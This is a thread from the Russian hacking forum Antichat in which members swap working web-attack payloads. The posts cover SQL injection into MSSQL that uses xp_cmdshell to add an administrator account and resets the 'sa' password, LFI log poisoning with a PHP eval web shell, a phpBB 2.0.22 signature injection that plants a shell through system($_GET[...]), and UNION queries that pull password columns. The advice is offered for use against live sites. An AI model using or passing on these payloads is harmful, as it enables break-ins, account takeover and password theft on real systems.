Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.04.2010, 14:26
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
в mssql если имя пользователя не sa при запросе:
http://test/news.asp?id=1+or+1=(select+system_user)--
то как я понимаю у меня не будет прав на выполнения команд?
|
|
|
30.04.2010, 14:52
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2pinch нет от этого не зависеть
если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--
Последний раз редактировалось shell_c0de; 30.04.2010 в 14:56..
|
|
|
|
30.04.2010, 16:27
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от FAQ666
есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror.
Делаю запрос вида http://www.site.com/<? траляля ?>
В лог пишется %3C? траляля ?%3E.
Что же делать?)
Сообщение от Pashkela
<?php file_get_contents('http://lala.com/<?php eval(stripslashes($_REQUEST[lol]));?>');?>
Сообщение от FAQ666
[uri "/%3C?php%20file_get_contents('http://lala.com/%3C?php%20eval(stripslashes($_REQUEST[lol]));?%3E');?%3E"]
Это специфика браузера. Используй гхром, через него должно быть тру. Ну или как уже сказано выше, используй не браузер.
|
|
|
|
30.04.2010, 17:25
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Как в phpBB 2.0.22 обойти usercp_avatar.php ??
не получаеться залить шел через аватарку. видно стоит обработка скриптом!
Или что можно воткнут в место phpinfo()
в
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb  hpinfo()' WHERE user_id=4;
штоб шел залить??
Последний раз редактировалось GOGA075; 30.04.2010 в 18:17..
|
|
|
|
30.04.2010, 19:13
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
вставляй system($_GET[tu4ka])
|
|
|
|
30.04.2010, 22:19
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
|
|
|
|
30.04.2010, 22:35
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Konqi, попробуй shar() либо concat_ws()
|
|
|
|
30.04.2010, 22:36
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users
count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?
Последний раз редактировалось Gorev; 30.04.2010 в 22:40..
|
|
|
|
30.04.2010, 22:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от GOGA075
Konqi, попробуй shar() либо concat_ws()
чаром нельзя,а конкат не че не может изменить ибо это функция для соединения результатов,не больше.
|
|
|
|
30.04.2010, 22:40
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
budden, и что мне этот код даст?
он мне просто ошибку выдает...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
